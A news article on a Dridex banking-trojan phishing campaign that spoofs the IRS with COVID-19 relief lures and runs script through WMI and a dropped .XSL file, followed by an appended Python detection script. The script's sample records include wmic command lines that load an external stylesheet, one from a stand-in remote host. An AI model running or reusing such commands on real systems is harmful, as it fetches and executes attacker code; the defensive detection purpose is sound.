Dridex Malware Uses US $4,000 COVID-19 ‘Relief Checks’ as Lure!

The American Rescue Act is the newest lure being circulated in an e-mail campaign.

Cyber-criminals are taking advantage of the American Rescue Plan – the COVID-19 relief legislation just signed into US law – as a lure for email-based scams.

According to researchers at Cofense, a campaign began circulating in March that relied on Americans’ interest in the new $1,400 relief payments & other aid.

US Internal Revenue Service

The emails impersonate the IRS (US Internal Revenue Service), using the agency’s official logo & a spoofed IRS[.]gov sender domain, & claim to offer an application for financial assistance. What they actually deliver, however, is the Dridex banking trojan.

The email states, “It is possible to get aid from the Federal Govt. of your choice” & then offers “quotes” for a pie-in-the-sky litany of great (& non-existent) things – such as a $4,000 check, the ability to “skip the queue for vaccination” & free food.

There is a button that states, “Get apply form” – if clicked, users are taken to a Dropbox account where they see an Excel document that says, “Fill this form below to accept Federal State Aid.”

To see this supposed IRS form fully, victims are prompted to enable content. When they do, they launch macros that set off the infection chain indirectly, observed Cofense.

Static Analysis

“While static analysis easily identifies the URLs used to download malware in this case, automated behavioural analysis may have trouble recognising the activity as malicious because it does not use macros to directly download malware or run a PowerShell script,” Cofense researchers explained on Tues.

“The macros used by the .XLSM files drop an .XSL file to disk, & then use a Windows Management Instrumentation (WMI) query to gather system information.”

PowerShell

WMI is a Windows management sub-system, commonly accessed through PowerShell, that gives admins access to system monitoring tools, including the ability to ask for information about anything that exists on a given computer – such as which files & applications are present. It can also be told to return the responses to these queries in a particular format.

“The WMI query employed in this case…demands that the dropped .XSL file be used to format the response to the query,” researchers wrote.

“This formatting directive allows JavaScript contained in the .XSL file to be executed via WMI & download malware, avoiding the more commonly seen methods via PowerShell.”

What is Dridex?

Since its first appearance in 2011, the Dridex malware (a.k.a. Bugat & Cridex) has been distributed via phishing emails & generally targets banking information. After capturing banking credentials, it endeavours to make unauthorised electronic funds transfers from unwary victims’ bank accounts.

By 2015, the malware was one of the most prevalent financial trojans out there, particularly when it came to targeting corporate employees; later versions added the extra function of helping to install ransomware. It has also improved its obfuscation capabilities over time.

Russian-Speaking

In Dec. 2019, authorities cracked down on Russian-speaking cyber-crime group Evil Corp. with sanctions & charges against its leader, Maksim Yakubets, known for his lavish lifestyle.

US authorities are still offering up to $5m for information leading to his arrest; they allege that Yakubets & Evil Corp. have stolen millions of dollars from victims using the Dridex banking trojan & Zeus malware.

The Phish

This latest campaign is very convincing, researchers observed – but only to a certain extent. One technique the attackers use is that the email domain is lRS[.]gov – but with a lower-case ‘L’ rather than an upper-case ‘I.’

However, phrasing like “Federal State Aid” (Federal & State Aid are different) & bad grammar such as “the federal government of your choice” should set off alarm bells.

“A close examination of the email shows a few suspicious characteristics,” according to Cofense. “The phrasing within the document, while not clearly as bad as something auto-translated from another language, still has some mistakes that are not expected from what purports to be a govt. communication.”

Phishing-Recognition Skills

They added, “Despite those issues, this campaign is likely to entice the average user who’s in a hurry to learn more about the rescue plan.”

To avoid being a victim, users should improve their phishing-recognition skills, e.g., checking for slight differences between real & spoofed domains. For businesses, “as a general rule, WMI & PowerShell should be carefully monitored on most work-stations,” Cofense recommended.
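As an added example (not from the article or from Cofense), here is the kind of workstation monitoring the closing recommendation describes: a short Python check over constructed Sysmon-style process-creation records that flags wmic.exe being told to format its query output with an external .XSL stylesheet, the technique described in the Static Analysis section, and additionally flags wmic.exe spawned by an Office application. It assumes the WMI query is issued through the wmic command-line tool’s /format switch; the article does not name the tool, and the file paths and URL below are made up.

```python
import re

# Constructed sample process-creation records, modelled on Sysmon Event ID 1
# fields (Image, ParentImage, CommandLine). They are made-up examples, not
# telemetry from the campaign the article describes.
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE",
     "CommandLine": r'wmic os get /format:"C:\Users\Public\update.xsl"'},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic os get caption,version /format:list"},
    {"Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": r"powershell.exe -NoProfile Get-WmiObject Win32_OperatingSystem"},
    {"Image": r"C:\Windows\System32\wbem\WMIC.exe",
     "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"wmic process list brief /format:https://example.invalid/x.xsl"},
]

OFFICE_APPS = ("excel.exe", "winword.exe", "powerpnt.exe")
# Captures the argument of wmic's /format: switch, quoted or unquoted.
FORMAT_ARG = re.compile(r'/format:\s*"?([^"\s]+)"?', re.IGNORECASE)


def analyse_event(event):
    """Return the reasons a record looks like XSL script execution via WMI."""
    reasons = []
    image = event["Image"].lower()
    parent = event["ParentImage"].lower()
    if not image.endswith("\\wmic.exe"):
        return reasons
    match = FORMAT_ARG.search(event["CommandLine"])
    if match:
        target = match.group(1)
        # Built-in formats are bare keywords (list, csv, xml ...); a path,
        # URL or explicit .xsl file means a caller-supplied stylesheet.
        if target.lower().endswith(".xsl") or "://" in target or "\\" in target:
            reasons.append(f"wmic output formatted by external stylesheet: {target}")
    if parent.endswith(OFFICE_APPS):
        reasons.append(f"wmic spawned by Office application: {event['ParentImage']}")
    return reasons


def scan(events):
    """Map the index of each suspicious record to its list of reasons."""
    findings = {}
    for index, event in enumerate(events):
        reasons = analyse_event(event)
        if reasons:
            findings[index] = reasons
    return findings
```

Running `scan(SAMPLE_EVENTS)` flags the first and last records only; the plain `/format:list` query and the PowerShell WMI call pass as benign.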
